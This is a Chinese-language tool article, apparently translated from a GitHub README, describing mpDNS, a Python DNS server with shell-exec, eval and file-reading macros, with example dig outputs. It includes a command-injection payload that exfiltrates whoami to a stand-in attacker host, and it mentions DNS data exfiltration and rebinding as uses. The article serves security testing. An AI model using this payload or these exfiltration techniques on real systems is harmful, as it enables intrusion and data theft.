mpDNS:Python實現的多功能DNS伺服器
簡單、可配置的“ clone和run ”DNS伺服器,具有多種有用的功能。
適用於Python 2和3
names.db – >包含所有自定義記錄(參見示例)
簡單的萬用字元,如* .example.com
捕獲unicode dns請求
自定義動作又稱巨集:
-{{shellexec::dig google.com +short}}
– >執行shell命令並使用result響應
-{{eval::res = '1.1.1.%d' % random.randint(0,256)}}
- >評估你的python程式碼
-{{file::/etc/passwd}}
– >回覆本地檔案內容
-{{resolve}}
– >將DNS請求轉發到本地系統DNS
-{{resolve::example.com}}
– >解析example.com而不是原始記錄
-{{echo}}
– >回覆對等地址
-{{shellexec::echo %PEER% %QUERY%}}
– >使用變數
支援的查詢型別:A
,CNAME
,TXT
更新names.db
記錄而不重啟/重新載入./mpdns.py -e
重度基於https://github.com/circuits/circuits/blob/master/examples/dnsserver.py
用法:./mpdns.py
編輯names.db
,./mpdns.py -e
無需重啟
進攻和防守目的:
1.您需要一個輕量級的簡單DNS伺服器解決方案用於測試目的(不生產!)
2.測試Web應用程式中的各種盲注漏洞(例如/ping.php?ip=$(dig $(whoami).attacker.com))
3.在一個TXT
查詢中輕鬆滲透65K資料
4.DNS重新繫結
5.對特定查詢執行自定義巨集操作(在惡意軟體分析實驗室環境中很有用)
6.還有更多。它是高度可定製的。
安裝
git clonehttps://github.com/nopernik/mpDNS
限制
1.由於UDP資料報限制為65535位元組,DNS響應限制在約65200位元組, 此限制適用於TXT
分成256位元組塊的記錄,直到響應達到最大允許值65200b, 因此TXT
巨集記錄{{file:localfile.txt}}
限制為65200位元組。
2.不支援巢狀萬用字元test.*.example.com
3.{{resolve::example.com}}
巨集中不支援自定義DNS伺服器解析程式
4.TTL
始終設為0
例子
names.db示例:
# Empty configuration will result in empty but valid responses # # Unicode domain names are not supported but still can be catched by the server. # for example мама-сервер-unicode.google.com will be catched but with SERVFAIL response passwd.example.comTXT{{file::/etc/passwd}}#comments are ignored shellexecTXT{{shellexec::whoami}} evalTXT{{eval::import random; res = random.randint(1,500)}} resolve1A{{resolve}} resolve2A{{resolve::self}}#same as previous resolve3A{{resolve::example.com}} blabla.comA5.5.5.5 *A127.0.0.1 *.example.comA7.7.7.7 c1.example.comCNAMEc2.example.com c2.example.comCNAMEc3.example.com c3.example.comCNAMEgoogle.example.com google.example.comCNAMEgoogle.com test.example.comA8.8.8.8 google.comA{{resolve::self}} notgoogle.comA{{resolve::google.com}}
使用names.db示例輸出示例:
DB的定期解決方案:dig test.example.com @localhost
;; ANSWER SECTION: test.example.com.0INA8.8.8.8
mpDNS輸出:- Request from 127.0.0.1:57698 -> test.example.com. -> 8.8.8.8 (A)
遞迴CNAME解析:dig c1.example.com @localhost
;; QUESTION SECTION: ;c1.example.com.INA ;; ANSWER SECTION: c1.example.com.0INCNAMEc2.example.com. c2.example.com.0INCNAMEc3.example.com. c3.example.com.0INCNAMEgoogle.example.com. google.example.com.0INCNAMEgoogle.com. google.com.0INA216.58.206.14
mpDNS輸出:
- Request from 127.0.0.1:44120-> c1.example.com.-> c2.example.com (CNAME) - Request from 127.0.0.1:44120-> c2.example.com-> c3.example.com (CNAME) - Request from 127.0.0.1:44120-> c3.example.com-> google.example.com (CNAME) - Request from 127.0.0.1:44120-> google.example.com-> google.com (CNAME) - Request from 127.0.0.1:44120-> google.com-> {{resolve::self}} (A)
萬用字元解析:dig not-in-db.com @localhost
;; ANSWER SECTION: not-in-db.com.0INA127.0.0.1
mpDNS輸出:- Request from 127.0.0.1:38528 -> not-in-db.com. -> 127.0.0.1 (A)
萬用字元子域解析:dig wildcard.example.com @localhost
;; ANSWER SECTION: wildcard.example.com.0INA7.7.7.7
mpDNS輸出:- Request from 127.0.0.1:39691 -> wildcard.example.com. -> 7.7.7.7 (A)
轉發請求巨集:dig google.com @localhost
;; ANSWER SECTION: google.com.0INA172.217.22.110
mpDNS輸出:- Request from 127.0.0.1:53487 -> google.com. -> {{resolve::self}} (A)
自定義域巨集的轉發請求:dig notgoogle.com @localhost
;; ANSWER SECTION: notgoogle.com.0INA172.217.22.110
mpDNS輸出:- Request from 127.0.0.1:47797 -> notgoogle.com. -> {{resolve::google.com}} (A)
通過TXT查詢檔案內容巨集:dig txt passwd.example.com @localhost
;; ANSWER SECTION: passwd.example.com.0INTXT"root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:......stripped"
mpDNS輸出:- Request from 127.0.0.1:38805 -> passwd.example.com. -> ['root:x:0:0:root...(2808)'] (TXT)
通過TXT查詢自定義python程式碼巨集:dig txt eval @localhost
;; ANSWER SECTION: eval.0INTXT"320"
mpDNS輸出:- Request from 127.0.0.1:33821 -> eval. -> ['320'] (TXT)
Shell命令巨集通過TXT查詢:dig txt shellexec @localhost
;; ANSWER SECTION: shellexec.0INTXT"root"
mpDNS輸出:- Request from 127.0.0.1:50262 -> shellexec. -> ['root'] (TXT)
*參考來源github ,由周大濤編譯,轉載請註明來自FreeBuf.COM。